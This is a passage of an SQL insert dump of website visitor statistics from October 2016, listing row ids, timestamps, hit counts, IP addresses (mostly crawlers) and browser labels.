1,0,0,'51.255.65.88','other'),(66379,1475795452,1,0,1,0,'66.249.76.46',''),(66380,1475795472,1,1,0,0,'163.172.65.226','other'),(66381,1475795861,1,1,0,0,'66.102.9.25','other'),(66382,1475796130,1,1,0,0,'164.132.161.93','other'),(66383,1475796438,1,0,1,0,'66.249.75.179',''),(66384,1475796479,1,1,0,0,'130.193.50.34','other'),(66385,1475798971,1,1,0,0,'163.172.66.156','other'),(66386,1475799070,1,1,0,0,'66.102.9.27','other'),(66387,1475799445,1,1,0,0,'163.172.65.19','other'),(66388,1475799582,1,1,0,0,'164.132.161.93','other'),(66389,1475800370,1,1,0,0,'164.132.161.92','other'),(66390,1475801144,1,1,0,0,'163.172.65.130','other'),(66391,1475802434,1,1,0,0,'66.102.9.25','other'),(66392,1475802741,1,1,0,0,'157.55.39.147','other'),(66393,1475802817,1,1,0,0,'164.132.161.7','other'),(66394,1475804542,1,1,0,0,'163.172.64.222','other'),(66395,1475806534,1,1,0,0,'164.132.161.81','other'),(66396,1475806640,1,1,0,0,'66.102.9.29','other'),(66397,1475806776,2,2,0,0,'157.55.39.28','other'),(66398,1475807072,1,0,1,0,'66.249.75.179',''),(66399,1475807511,1,1,0,0,'157.55.39.147','other'),(66400,1475808369,1,1,0,0,'163.172.66.64','other'),(66401,1475809293,1,1,0,0,'164.132.161.21','other'),(66402,1475809615,1,1,0,0,'66.102.9.27','other'),(66403,1475810142,179,179,0,0,'151.80.44.115','other'),(66404,1475810640,1,1,0,0,'213.179.252.206','chrome'),(66405,1475810982,1,1,0,0,'163.172.66.54','other'),(66406,1475811726,1,0,1,0,'66.249.76.47',''),(66407,1475813757,1,1,0,0,'66.102.9.25','other'),(66408,1475816426,1,0,1,0,'66.249.76.45',''),(66409,1475816871,1,1,0,0,'163.172.64.181','other'),(66410,1475817027,1,1,0,0,'66.102.9.25','other'),(66411,1475817342,1,1,0,0,'51.255.65.57','other'),(66412,1475817899,1,1,0,0,'91.196.178.66','firefox'),(66413,1475818032,1,1,0,0,'164.132.161.28','other'),(66414,1475818300,1,0,1,0,'66.249.76.47',''),(66415,1475818349,1,0,1,0,'66.249.76.45',''),(66416,1475818501,1,1,0,0,'5.255.250.41','other'),(66417,1475818791,1,1,0,0,'51.255.65.24','other'),(66418,1475818793,1,1,0,0,'157.55.39.147','other'),(66419,1475818942,1,1,0,0,'94.179.125.10','firefox'),(66420,1475819522,1,1,0,0,'66.102.9.27','chrome'),(66421,1475819791,1,1,0,0,'180.76.15.17','other'),(66422,1475820458,1,1,0,0,'176.102.195.10','firefox'),(66423,1475820583,1,1,0,0,'194.37.248.11','chrome'),(66424,1475820781,1,1,0,0,'91.196.178.67','firefox'),(66425,1475820882,1,1,0,0,'163.172.65.46','other'),(66426,1475821059,1,1,0,0,'66.102.9.29','other'),(66427,1475821447,1,1,0,0,'164.132.161.2','other'),(66428,1475821465,1,1,0,0,'66.249.76.81','chrome'),(66429,1475821569,1,1,0,0,'130.193.50.34','other'),(66430,1475821749,1,1,0,0,'157.55.39.147','other'),(66431,1475822110,2,2,0,0,'95.213.141.126','opera'),(66432,1475822118,1,1,0,0,'66.249.76.79','chrome'),(66433,1475822249,1,1,0,0,'94.179.124.151','chrome'),(66434,1475822939,1,1,0,0,'51.255.65.62','other'),(66435,1475823009,1,1,0,0,'188.32.52.136','chrome'),(66436,1475823813,1,1,0,0,'164.132.161.78','other'),(66437,1475824099,1,1,0,0,'91.196.178.132','chrome'),(66438,1475824273,1,1,0,0,'66.102.9.29','other'),(66439,1475824431,1,1,0,0,'91.196.178.169','firefox'),(66440,1475824489,1,1,0,0,'91.196.178.65','firefox'),(66441,1475825274,1,1,0,0,'91.196.177.15','chrome'),(66442,1475825429,1,0,1,0,'66.249.76.46',''),(66443,1475826065,1,1,0,0,'207.46.13.166','other'),(66444,1475826889,1,1,0,0,'51.255.65.57','other'),(66445,1475826909,1,1,0,0,'164.132.161.60','other'),(66446,1475826911,1,1,0,0,'91.196.178.70','chrome'),(66447,1475827090,1,1,0,0,'46.133.206.236','chrome'),(66448,1475827645,1,1,0,0,'66.102.9.25','other'),(66449,1475828092,1,1,0,0,'91.196.178.67','chrome'),(66450,1475828572,1,1,0,0,'82.207.26.224','firefox'),(66451,1475828579,2,2,0,0,'193.150.6.29','firefox'),(66452,1475828673,1,1,0,0,'91.196.178.66','firefox'),(66453,1475829934,1,1,0,0,'163.172.66.177','other'),(66454,1475830313,1,1,0,0,'37.53.226.41','chrome'),(66455,1475830346,1,1,0,0,'91.196.178.66','firefox'),(66456,1475831285,1,1,0,0,'66.102.9.27','other'),(66457,1475831327,1,1,0,0,'37.54.21.101','firefox'),(66458,1475831552,1,1,0,0,'180.76.15.34','other'),(66459,1475831613,1,1,0,0,'95.134.16.18','firefox'),(66460,1475831767,1,1,0,0,'91.196.178.66','firefox'),(66461,1475832057,1,1,0,0,'163.172.65.110','other'),(66462,1475832205,1,1,0,0,'213.5.192.231','firefox'),(66463,1475834974,1,1,0,0,'66.102.9.29','other'),(66464,1475835900,1,1,0,0,'91.196.178.65','chrome'),(66465,1475836150,1,1,0,0,'163.172.66.60','other'),(66466,1475836974,1,1,0,0,'164.132.161.63','other'),(66467,1475837020,1,1,0,0,'51.255.65.94','other'),(66468,1475837371,1,0,1,0,'66.249.75.187',''),(66469,1475838097,1,1,0,0,'91.196.178.169','firefox'),(66470,1475838111,1,1,0,0,'66.249.76.81','chrome'),(66471,1475838340,1,1,0,0,'66.102.9.27','other'),(66472,1475839048,1,1,0,0,'91.196.178.169','firefox'),(66473,1475839463,1,1,0,0,'163.172.65.18','other'),(66474,1475840439,1,0,1,0,'66.249.76.47',''),(66475,1475840474,1,1,0,0,'91.196.178.66','firefox'),(66476,1475840658,1,1,0,0,'212.92.225.168','chrome'),(66477,1475841776,1,1,0,0,'37.53.89.22','chrome'),(66478,1475841987,1,1,0,0,'95.134.169.232','chrome'),(66479,1475842070,1,1,0,0,'66.102.9.29','other'),(66480,1475842217,1,1,0,0,'51.255.65.60','other'),(66481,1475842315,1,1,0,0,'51.255.65.84','other'),(66482,1475842601,1,1,0,0,'163.172.66.121','other'),(66483,1475843028,1,1,0,0,'164.132.161.75','other'),(66484,1475843500,1,0,1,0,'66.249.75.179',''),(66485,1475843504,1,1,0,0,'66.249.76.45','chrome'),(66486,1475843651,2,0,2,0,'66.249.76.46',''),(66487,1475843853,1,1,0,0,'212.92.225.168','chrome'),(66488,1475843883,1,0,1,0,'66.249.76.77',''),(66489,1475844577,1,1,0,0,'163.172.66.119','other'),(66490,1475844673,1,0,1,0,'66.249.76.47',''),(66491,1475845491,1,1,0,0,'66.102.9.29','other'),(66492,1475845795,3,3,0,0,'130.193.50.34','other'),(66493,1475845818,1,1,0,0,'51.255.65.67','other'),(66494,1475845912,1,1,0,0,'163.172.66.11','other'),(66495,1475846166,1,0,1,0,'66.249.76.77',''),(66496,1475846184,4,4,0,0,'141.8.183.25','other'),(66497,1475846384,1,1,0,0,'163.172.66.75','other'),(66498,1475847131,2,2,0,0,'130.193.50.34','other'),(66499,1475847261,2,2,0,0,'141.8.183.25','other'),(66500,1475847280,1,1,0,0,'51.255.65.70','other'),(66501,1475847388,1,0,1,0,'66.249.76.77',''),(66502,1475847542,1,1,0,0,'91.196.178.161','chrome'),(66503,1475849286,1,1,0,0,'66.102.9.25','other'),(66504,1475849632,1,1,0,0,'51.255.65.59','other'),(66505,1475849843,1,1,0,0,'94.179.246.127','firefox'),(66506,1475849974,1,1,0,0,'163.172.65.244','other'),(66507,1475850084,1,1,0,0,'130.193.50.34','other'),(66508,1475850840,1,1,0,0,'164.132.161.71','other'),(66509,1475850980,1,1,0,0,'164.132.161.94','other'),(66510,1475851572,1,1,0,0,'157.55.39.28','other'),(66511,1475851582,1,1,0,0,'164.132.161.73','other'),(66512,1475852068,1,1,0,0,'164.132.161.67','other'),(66513,1475853517,1,1,0,0,'51.255.65.3','other'),(66514,1475853554,1,1,0,0,'51.255.65.42','other'),(66515,1475854939,1,1,0,0,'164.132.161.55','other'),(66516,1475855519,1,1,0,0,'193.107.72.82','chrome'),(66517,1475856335,1,1,0,0,'66.102.9.29','other'),(66518,1475856343,1,1,0,0,'91.196.178.163','other'),(66519,1475856827,1,0,1,0,'66.249.76.77',''),(66520,1475856929,1,1,0,0,'164.132.161.75','other'),(66521,1475857404,1,1,0,0,'157.55.39.147','other'),(66522,1475857937,1,1,0,0,'51.255.65.89','other'),(66523,1475858237,1,1,0,0,'66.249.76.79','chrome'),(66524,1475858381,1,1,0,0,'163.172.66.134','other'),(66525,1475859578,1,0,1,0,'66.249.76.47',''),(66526,1475859884,1,1,0,0,'163.172.66.30','other'),(66527,1475860018,1,1,0,0,'66.102.9.29','other'),(66528,1475860675,1,1,0,0,'51.255.65.75','other'),(66529,1475861247,1,1,0,0,'130.193.50.34','other'),(66530,1475861290,1,1,0,0,'77.91.163.60','chrome'),(66531,1475861805,1,1,0,0,'163.172.65.128','other'),(66532,1475863667,1,1,0,0,'157.55.39.28','other'),(66533,1475863903,1,1,0,0,'66.102.9.25','other'),(66534,1475863924,1,1,0,0,'180.76.15.150','other'),(66535,1475864332,41,41,0,0,'195.154.187.115','other'),(66536,1475864712,1,1,0,0,'164.132.161.76','other'),(66537,1475865815,1,1,0,0,'163.172.65.184','other'),(66538,1475866509,1,1,0,0,'51.255.65.77','other'),(66539,1475867037,1,1,0,0,'164.132.161.92','other'),(66540,1475867133,1,1,0,0,'51.255.65.89','other'),(66541,1475867370,1,1,0,0,'66.102.9.25','other'),(66542,1475868407,1,0,1,0,'66.249.76.47',''),(66543,1475868452,1,1,0,0,'130.193.50.34','other'),(66544,1475869190,1,1,0,0,'212.90.63.46','chrome'),(66545,1475869642,2,2,0,0,'91.196.178.71','chrome'),(66546,1475870254,1,0,1,0,'68.180.229.114',''),(66547,1475870704,1,1,0,0,'66.102.9.27','other'),(66548,1475871936,1,1,0,0,'51.255.65.16','other'),(66549,1475872465,1,1,0,0,'164.132.161.31','other'),(66550,1475872733,1,0,1,0,'66.249.65.185',''),(66551,1475872770,6,0,6,0,'68.180.229.114',''),(66552,1475873547,1,1,0,0,'141.8.183.25','other'),(66553,1475874138,1,0,1,0,'68.180.229.114',''),(66554,1475874592,1,1,0,0,'164.132.161.71','other'),(66555,1475874785,1,0,1,0,'66.249.73.133',''),(66556,1475875288,1,1,0,0,'164.132.161.7','other'),(66557,1475875588,1,1,0,0,'51.255.65.41','other'),(66558,1475875682,4,4,0,0,'130.193.50.34','other'),(66559,1475875867,1,1,0,0,'66.102.9.29','other'),(66560,1475875882,1,1,0,0,'51.255.65.90','other'),(66561,1475877355,1,1,0,0,'163.172.64.184','other'),(66562,1475877671,1,1,0,0,'164.132.161.33','other'),(66563,1475877841,1,1,0,0,'163.172.65.127','other'),(66564,1475878394,1,1,0,0,'157.55.39.28','other'),(66565,1475879049,1,1,0,0,'163.172.64.224','other'),(66566,1475879062,1,1,0,0,'66.102.9.27','other'),(66567,1475879191,1,1,0,0,'66.249.65.188','chrome'),(66568,1475879254,1,0,1,0,'68.180.229.114',''),(66569,1475880199,1,0,1,0,'66.249.65.188',''),(66570,1475880494,1,1,0,0,'66.249.76.46','chrome'),(66571,1475880711,1,1,0,0,'163.172.66.109','other'),(66572,1475881343,1,1,0,0,'163.172.66.159','other'),(66573,1475881357,1,1,0,0,'157.55.39.28','other'),(66574,1475882173,1,1,0,0,'66.249.76.47','chrome'),(66575,1475882288,1,1,0,0,'164.132.161.12','other'),(66576,1475882549,1,1,0,0,'66.102.9.27','other'),(66577,1475883170,1,1,0,0,'51.255.65.8','other'),(66578,1475883193,1,1,0,0,'164.132.161.55','other'),(66579,1475883223,1,0,1,0,'66.249.65.182',''),(66580,1475885330,1,1,0,0,'163.172.66.142','other'),(66581,1475885801,1,1,0,0,'51.255.65.86','other'),(66582,1475885821,1,1,0,0,'157.55.39.28','other'),(66583,1475885857,1,1,0,0,'66.102.9.29','other'),(66584,1475886274,1,1,0,0,'164.132.161.8','other'),(66585,1475886567,1,1,0,0,'163.172.66.7','other'),(66586,1475887119,1,1,0,0,'163.172.65.7','other'),(66587,1475887247,1,1,0,0,'163.172.64.247','other'),(66588,1475887676,1,1,0,0,'180.76.15.12','other'),(66589,1475888598,1,1,0,0,'164.132.161.16','other'),(66590,1475890356,1,1,0,0,'66.102.9.25','other'),(66591,1475890442,1,1,0,0,'163.172.66.128','other'),(66592,1475890841,1,1,0,0,'163.172.66.123','other'),(66593,1475891355,1,1,0,0,'163.172.66.49','other'),(66594,1475891403,1,1,0,0,'163.172.65.25','other'),(66595,1475891444,1,1,0,0,'51.255.65.7','other'),(66596,1475891563,1,1,0,0,'180.76.15.25','other'),(66597,1475892291,1,1,0,0,'66.102.9.27','other'),(66598,1475892661,1,1,0,0,'164.132.161.32','other'),(66599,1475892713,1,0,1,0,'68.180.229.114',''),(66600,1475893300,1,1,0,0,'141.8.183.25','other'),(66601,1475894041,1,1,0,0,'51.255.65.23','other'),(66602,1475895890,1,1,0,0,'66.102.9.27','other'),(66603,1475897261,1,1,0,0,'163.172.65.38','other'),(66604,1475897818,1,1,0,0,'163.172.66.60','other'),(66605,1475897887,1,1,0,0,'51.255.65.18','other'),(66606,1475897907,1,1,0,0,'163.172.66.5','other'),(66607,1475898335,1,1,0,0,'163.172.66.52','other'),(66608,1475898432,1,1,0,0,'141.8.183.25','other'),(66609,1475899415,1,0,1,0,'66.249.65.185',''),(66610,1475899492,1,1,0,0,'66.102.9.29','other'),(66611,1475899774,1,1,0,0,'51.255.65.87','other'),(66612,1475899785,1,0,1,0,'66.249.76.77',''),(66613,1475900181,1,1,0,0,'163.172.65.60','other'),(66614,1475901764,1,1,0,0,'163.172.66.45','other'),(66615,1475901981,1,1,0,0,'66.249.65.188','chrome'),(66616,1475902395,1,1,0,0,'163.172.65.234','other'),(66617,1475902675,1,1,0,0,'163.172.66.38','other'),(66618,1475902803,1,1,0,0,'163.172.65.59','other'),(66619,1475902944,1,1,0,0,'157.55.39.147','other'),(66620,1475903070,1,1,0,0,'66.249.76.47','chrome'),(66621,1475903305,1,1,0,0,'164.132.161.60','other'),(66622,1475903436,1,1,0,0,'66.102.9.29','other'),(66623,1475903441,1,1,0,0,'163.172.65.61','other'),(66624,1475903847,1,1,0,0,'164.132.161.32','other'),(66625,1475903963,1,1,0,0,'163.172.66.45','other'),(66626,1475904174,1,1,0,0,'164.132.161.75','other'),(66627,1475904712,1,1,0,0,'66.102.9.27','chrome'),(66628,1475905082,1,1,0,0,'51.255.65.67','other'),(66629,1475905229,1,1,0,0,'163.172.66.149','other'),(66630,1475905418,1,1,0,0,'163.172.66.178','other'),(66631,1475906345,1,1,0,0,'51.255.65.94','other'),(66632,1475906454,1,1,0,0,'130.193.50.34','other'),(66633,1475906583,1,0,1,0,'66.249.76.45',''),(66634,1475906918,1,1,0,0,'66.102.9.29','other'),(66635,1475907099,1,1,0,0,'94.179.72.189','firefox'),(66636,1475907155,1,1,0,0,'51.255.65.15','other'),(66637,1475907745,1,0,1,0,'68.180.229.114',''),(66638,1475908520,2,2,0,0,'95.213.141.126','opera'),(66639,1475909061,1,1,0,0,'178.92.249.254','firefox'),(66640,1475909160,1,1,0,0,'94.179.21.157','chrome'),(66641,1475909533,1,1,0,0,'178.154.189.31','other'),(66642,1475909543,1,1,0,0,'93.158.152.51','other'),(66643,1475909563,1,1,0,0,'5.255.253.68','other'),(66644,1475909630,1,1,0,0,'141.8.142.62','other'),(66645,1475910054,1,1,0,0,'51.255.65.68','other'),(66646,1475910255,1,1,0,0,'164.132.161.5','other'),(66647,1475910472,1,1,0,0,'164.132.161.45','other'),(66648,1475910648,1,0,1,0,'66.249.76.47',''),(66649,1475910709,1,1,0,0,'51.255.65.96','other'),(66650,1475911856,1,1,0,0,'95.221.248.128','firefox'),(66651,1475911883,1,1,0,0,'163.172.65.5','other'),(66652,1475912365,1,1,0,0,'163.172.65.40','other'),(66653,1475912997,1,1,0,0,'51.255.65.83','other'),(66654,1475913625,1,1,0,0,'163.172.66.121','other'),(66655,1475913784,1,1,0,0,'51.255.65.92','other'),(66656,1475913990,1,1,0,0,'66.249.93.13','chrome'),(66657,1475914299,1,0,1,0,'66.249.76.79',''),(66658,1475915196,1,1,0,0,'163.172.66.11','other'),(66659,1475916322,1,1,0,0,'163.172.66.25','other'),(66660,1475916576,1,1,0,0,'51.255.65.33','other'),(66661,1475916599,1,1,0,0,'163.172.65.216','other'),(66662,1475916719,1,1,0,0,'163.172.65.34','other'),(66663,1475917409,1,1,0,0,'130.193.50.34','other'),(66664,1475917456,1,0,1,0,'68.180.229.114',''),(66665,1475917867,1,1,0,0,'163.172.66.49','other'),(66666,1475918005,1,1,0,0,'163.172.66.72','other'),(66667,1475918130,1,1,0,0,'51.255.65.18','other'),(66668,1475918148,1,0,1,0,'66.249.65.182',''),(66669,1475918245,1,1,0,0,'163.172.66.53','other'),(66670,1475918582,1,1,0,0,'163.172.66.52','other'),(66671,1475919084,1,1,0,0,'157.55.39.28','other'),(66672,1475919487,1,1,0,0,'163.172.66.148','other'),(66673,1475919653,1,1,0,0,'163.172.64.186','other'),(66674,1475919723,1,1,0,0,'130.193.50.34','other'),(66675,1475920386,1,1,0,0,'163.172.65.58','other'),(66676,1475920928,1,1,0,0,'95.134.169.232','chrome'),(66677,1475921172,1,1,0,0,'164.132.161.83','other'),(66678,1475921474,1,1,0,0,'51.255.65.23','other'),(66679,1475921960,1,0,1,0,'66.249.76.45',''),(66680,1475922424,1,1,0,0,'164.132.161.90','other'),(66681,1475922969,1,1,0,0,'164.132.161.74','other'),(66682,1475923550,1,1,0,0,'163.172.65.186','other'),(66683,1475923632,1,1,0,0,'163.172.66.52','other'),(66684,1475924019,1,1,0,0,'164.132.161.8','other'),(66685,1475924545,1,1,0,0,'163.172.64.244','other'),(66686,1475924973,2,0,2,0,'66.249.76.45',''),(66687,1475925013,1,0,1,0,'66.249.76.47',''),(66688,1475925250,1,1,0,0,'130.193.50.34','other'),(66689,1475925587,1,1,0,0,'163.172.66.129','other'),(66690,1475928007,2,0,2,0,'66.249.76.77',''),(66691,1475928649,1,0,1,0,'66.249.76.46',''),(66692,1475929606,1,1,0,0,'2.93.84.158','other'),(66693,1475929910,1,1,0,0,'94.179.14.134','chrome'),(66694,1475930011,1,0,1,0,'66.249.65.182',''),(66695,1475930394,1,1,0,0,'51.255.65.30','other'),(66696,1475930779,1,1,0,0,'164.132.161.97','other'),(66697,1475931755,1,1,0,0,'130.193.50.34','other'),(66698,1475932614,1,1,0,0,'164.132.161.84','other'),(66699,1475932988,1,1,0,0,'163.172.64.254','other'),(66700,1475933082,1,0,1,0,'66.249.76.47',''),(66701,1475934724,1,0,1,0,'68.180.229.114',''),(66702,1475934763,1,0,1,0,'66.249.76.46',''),(66703,1475935105,1,1,0,0,'163.172.65.15','other'),(66704,1475935185,1,1,0,0,'163.172.66.119','other'),(66705,1475936530,1,1,0,0,'178.92.249.254','firefox'),(66706,1475937369,1,1,0,0,'164.132.161.54','other'),(66707,1475937484,1,1,0,0,'164.132.161.34','other'),(66708,1475937486,1,1,0,0,'5.255.250.41','other'),(66709,1475938172,1,1,0,0,'180.76.15.6','other'),(66710,1475938764,1,1,0,0,'163.172.65.250','other'),(66711,1475942274,1,0,1,0,'68.180.229.114',''),(66712,1475942682,1,0,1,0,'66.249.76.79',''),(66713,1475942984,1,1,0,0,'91.196.178.66','firefox'),(66714,1475942998,2,0,2,0,'66.249.76.46',''),(66715,1475943049,1,1,0,0,'91.196.178.65','chrome'),(66716,1475943870,1,1,0,0,'46.201.134.216','chrome'),(66717,1475944151,1,1,0,0,'91.196.178.168','chrome'),(66718,1475944682,1,1,0,0,'51.255.65.87','other'),(66719,1475944913,1,1,0,0,'157.55.39.147','other'),(66720,1475944945,1,1,0,0,'163.172.66.49','other'),(66721,1475945039,1,1,0,0,'163.172.64.185','other'),(66722,1475945394,1,1,0,0,'164.132.161.25','other'),(66723,1475946042,1,1,0,0,'51.255.65.10','other'),(66724,1475947190,1,1,0,0,'163.172.65.227','other'),(66725,1475947435,1,1,0,0,'163.172.65.192','other'),(66726,1475947684,1,1,0,0,'51.255.65.17','other'),(66727,1475948077,1,1,0,0,'207.46.13.83','other'),(66728,1475948279,1,1,0,0,'163.172.66.58','other'),(66729,1475949355,1,1,0,0,'163.172.65.186','other'),(66730,1475949362,1,1,0,0,'157.55.39.28','other'),(66731,1475949642,1,1,0,0,'163.172.65.249','other'),(66732,1475950323,1,1,0,0,'164.132.161.52','other'),(66733,1475950361,1,1,0,0,'163.172.66.117','other'),(66734,1475950380,2,2,0,0,'66.249.76.47','chrome'),(66735,1475950585,1,1,0,0,'176.126.252.12','chrome'),(66736,1475950988,1,1,0,0,'163.172.64.179','other'),(66737,1475951575,1,1,0,0,'163.172.66.83','other'),(66738,1475951619,1,1,0,0,'163.172.66.67','other'),(66739,1475951743,1,1,0,0,'51.255.65.17','other'),(66740,1475951798,1,1,0,0,'163.172.66.108','other'),(66741,1475952367,1,1,0,0,'176.37.113.25','chrome'),(66742,1475952518,1,1,0,0,'130.193.50.34','other'),(66743,1475952707,1,1,0,0,'163.172.65.67','other'),(66744,1475952839,1,0,1,0,'66.249.65.188',''),(66745,1475952923,1,1,0,0,'163.172.65.51','other'),(66746,1475954231,1,1,0,0,'164.132.161.85','other'),(66747,1475954314,1,1,0,0,'163.172.65.34','other'),(66748,1475954536,1,1,0,0,'164.132.161.86','other'),(66749,1475954973,1,0,1,0,'66.249.76.47',''),(66750,1475955223,1,0,1,0,'66.249.76.77',''),(66751,1475955620,1,1,0,0,'51.255.65.54','other'),(66752,1475955722,1,1,0,0,'66.102.9.25','chrome'),(66753,1475956132,1,1,0,0,'51.255.65.66','other'),(66754,1475956352,1,1,0,0,'164.132.161.46','other'),(66755,1475956486,1,1,0,0,'163.172.65.19','other'),(66756,1475957477,1,0,1,0,'66.249.76.46',''),(66757,1475957660,1,0,1,0,'68.180.229.114',''),(66758,1475957855,1,1,0,0,'163.172.64.235','other'),(66759,1475958158,1,1,0,0,'51.255.65.30','other'),(66760,1475958839,1,0,1,0,'66.249.76.47',''),(66761,1475959068,1,0,1,0,'66.249.76.77',''),(66762,1475959414,1,1,0,0,'163.172.64.180','other'),(66763,1475959769,1,1,0,0,'51.255.65.64','other'),(66764,1475960572,1,1,0,0,'163.172.65.201','other'),(66765,1475960679,1,1,0,0,'51.255.65.74','other'),(66766,1475961059,1,1,0,0,'164.132.161.70','other'),(66767,1475961769,1,1,0,0,'164.132.161.40','other'),(66768,1475961894,1,0,1,0,'68.180.229.114',''),(66769,1475962160,1,1,0,0,'163.172.66.108','other'),(66770,1475962303,1,1,0,0,'163.172.65.17','other'),(66771,1475962543,1,1,0,0,'51.255.65.78','other'),(66772,1475962667,1,1,0,0,'164.132.161.77','other'),(66773,1475962807,1,1,0,0,'164.132.161.10','other'),(66774,1475963074,1,1,0,0,'164.132.161.89','other'),(66775,1475963847,1,1,0,0,'157.55.39.28','other'),(66776,1475964674,1,1,0,0,'5.255.250.41','other'),(66777,1475964881,1,0,1,0,'66.249.73.138',''),(66778,1475964987,1,1,0,0,'51.255.65.81','other'),(66779,1475965833,1,1,0,0,'163.172.66.62','other'),(66780,1475967292,1,1,0,0,'163.172.66.40','other'),(66781,1475969252,1,1,0,0,'157.55.39.147','other'),(66782,1475970009,1,0,1,0,'66.249.76.45',''),(66783,1475970533,1,1,0,0,'66.249.76.77','chrome'),(66784,1475973017,1,1,0,0,'91.78.222.207','chrome'),(66785,1475973261,2,0,2,0,'66.249.76.45',''),(66786,1475973386,1,1,0,0,'130.193.50.34','other'),(66787,1475975507,1,1,0,0,'130.193.50.34','other'),(66788,1475975620,187,187,0,0,'69.30.210.242','other'),(66789,1475975992,1,1,0,0,'157.55.39.28','other'),(66790,1475976525,15,15,0,0,'69.30.210.242','other'),(66791,1475979208,1,0,1,0,'66.249.76.77',''),(66792,1475980880,1,0,1,0,'66.249.76.45',''),(66793,1475981609,1,1,0,0,'164.132.161.16','other'),(66794,1475981953,1,1,0,0,'51.255.65.88','other'),(66795,1475982163,1,1,0,0,'163.172.64.217','other'),(66796,1475982902,18,18,0,0,'176.9.10.227','other'),(66797,1475982988,1,0,1,0,'66.249.76.46',''),(66798,1475983025,1,1,0,0,'164.132.161.43','other'),(66799,1475983307,1,1,0,0,'5.255.250.41','other'),(66800,1475983443,1,1,0,0,'51.255.65.40','other'),(66801,1475983630,1,0,1,0,'68.180.229.114',''),(66802,1475983740,1,0,1,0,'66.249.65.182',''),(66803,1475984237,1,1,0,0,'163.172.66.117','other'),(66804,1475984923,1,1,0,0,'51.255.65.73','other'),(66805,1475985536,1,0,1,0,'66.249.76.46',''),(66806,1475985844,1,1,0,0,'163.172.65.201','other'),(66807,1475986099,1,1,0,0,'163.172.65.194','other'),(66808,1475986644,1,0,1,0,'66.249.76.46',''),(66809,1475986758,1,1,0,0,'164.132.161.88','other'),(66810,1475986846,1,1,0,0,'178.255.215.94','other'),(66811,1475987261,1,1,0,0,'163.172.66.134','other'),(66812,1475987699,1,1,0,0,'164.132.161.30','other'),(66813,1475987881,1,1,0,0,'163.172.65.191','other'),(66814,1475987884,1,1,0,0,'163.172.65.240','other'),(66815,1475987980,1,1,0,0,'163.172.66.77','other'),(66816,1475988679,1,0,1,0,'66.249.65.185',''),(66817,1475988756,1,1,0,0,'51.255.65.15','other'),(66818,1475988865,2,0,2,0,'66.249.65.188',''),(66819,1475988935,1,0,1,0,'66.249.76.45',''),(66820,1475988940,1,1,0,0,'163.172.65.225','other'),(66821,1475988978,1,1,0,0,'164.132.161.81','other'),(66822,1475989195,1,1,0,0,'163.172.66.136','other'),(66823,1475989886,1,1,0,0,'51.255.65.70','other'),(66824,1475990646,1,1,0,0,'51.255.65.48','other'),(66825,1475991370,1,1,0,0,'51.255.65.63','other'),(66826,1475991474,1,1,0,0,'51.255.65.18','other'),(66827,1475991637,1,1,0,0,'164.132.161.33','other'),(66828,1475991663,1,1,0,0,'163.172.66.70','other'),(66829,1475991775,1,1,0,0,'163.172.64.189','other'),(66830,1475992168,1,1,0,0,'51.255.65.67','other'),(66831,1475992213,1,1,0,0,'163.172.65.195','other'),(66832,1475992726,1,1,0,0,'51.255.65.40','other'),(66833,1475993632,1,0,1,0,'66.249.76.45',''),(66834,1475995155,1,1,0,0,'163.172.65.225','other'),(66835,1475995341,1,1,0,0,'180.76.15.19','other'),(66836,1475995511,1,1,0,0,'51.255.65.76','other'),(66837,1475996810,1,1,0,0,'94.179.13.67','chrome'),(66838,1475997037,2,0,2,0,'66.249.76.47',''),(66839,1475997168,1,1,0,0,'164.132.161.29','other'),(66840,1475997350,1,1,0,0,'180.76.15.11','other'),(66841,1475997420,1,1,0,0,'37.112.238.103','msie'),(66842,1475997574,1,0,1,0,'66.249.76.46',''),(66843,1475998279,1,1,0,0,'163.172.65.129','other'),(66844,1475998752,1,1,0,0,'163.172.65.30','other'),(66845,1475998824,1,1,0,0,'51.255.65.63','other'),(66846,1475998856,1,1,0,0,'163.172.66.44','other'),(66847,1475998880,1,1,0,0,'51.255.65.71','other'),(66848,1475999506,2,2,0,0,'178.95.158.109','firefox'),(66849,1475999752,1,1,0,0,'51.255.65.72','other'),(66850,1476000233,1,1,0,0,'164.132.161.23','other'),(66851,1476000512,1,1,0,0,'94.179.13.67','chrome'),(66852,1476000577,1,1,0,0,'164.132.161.5','other'),(66853,1476000693,1,1,0,0,'164.132.161.74','other'),(66854,1476001171,1,0,1,0,'66.249.76.45',''),(66855,1476001278,1,1,0,0,'163.172.66.150','other'),(66856,1476001442,1,1,0,0,'178.92.249.254','firefox'),(66857,1476003597,1,1,0,0,'157.55.39.147','other'),(66858,1476003774,1,1,0,0,'51.255.65.17','other'),(66859,1476004466,1,1,0,0,'51.255.65.42','other'),(66860,1476004556,1,1,0,0,'164.132.161.31','other'),(66861,1476004824,1,1,0,0,'51.255.65.58','other'),(66862,1476005079,1,1,0,0,'163.172.66.13','other'),(66863,1476005183,1,1,0,0,'51.255.65.38','other'),(66864,1476005459,1,1,0,0,'163.172.66.120','other'),(66865,1476005559,1,1,0,0,'51.255.65.7','other'),(66866,1476005842,1,1,0,0,'51.255.65.43','other'),(66867,1476006263,1,1,0,0,'91.196.178.71','chrome'),(66868,1476007118,1,1,0,0,'51.255.65.9','other'),(66869,1476007664,1,1,0,0,'157.55.39.147','other'),(66870,1476007955,1,1,0,0,'163.172.65.182','other'),(66871,1476009329,1,1,0,0,'66.249.73.133','chrome'),(66872,1476009514,2,0,2,0,'66.249.76.46',''),(66873,1476009680,1,0,1,0,'68.180.229.114',''),(66874,1476009822,1,0,1,0,'66.249.76.47',''),(66875,1476010508,1,1,0,0,'164.132.161.53','other'),(66876,1476010630,1,1,0,0,'163.172.66.32','other'),(66877,1476011242,1,1,0,0,'51.255.65.66','other'),(66878,1476011497,1,1,0,0,'66.249.76.45','chrome'),(66879,1476012149,1,1,0,0,'51.255.65.9','other'),(66880,1476012396,1,1,0,0,'51.255.65.73','other'),(66881,1476012929,1,0,1,0,'68.180.229.114',''),(66882,1476013140,1,1,0,0,'164.132.161.16','other'),(66883,1476013900,1,1,0,0,'164.132.161.49','other'),(66884,1476014268,1,1,0,0,'164.132.161.19','other'),(66885,1476014895,1,1,0,0,'91.196.178.133','firefox'),(66886,1476015087,1,1,0,0,'130.193.50.34','other'),(66887,1476015234,1,1,0,0,'163.172.66.69','other'),(66888,1476015549,1,0,1,0,'68.180.229.114',''),(66889,1476015581,1,1,0,0,'51.255.65.78','other'),(66890,1476015738,1,1,0,0,'164.132.161.55','other'),(66891,1476016574,1,1,0,0,'51.255.65.6','other'),(66892,1476016620,1,1,0,0,'180.76.15.146','other')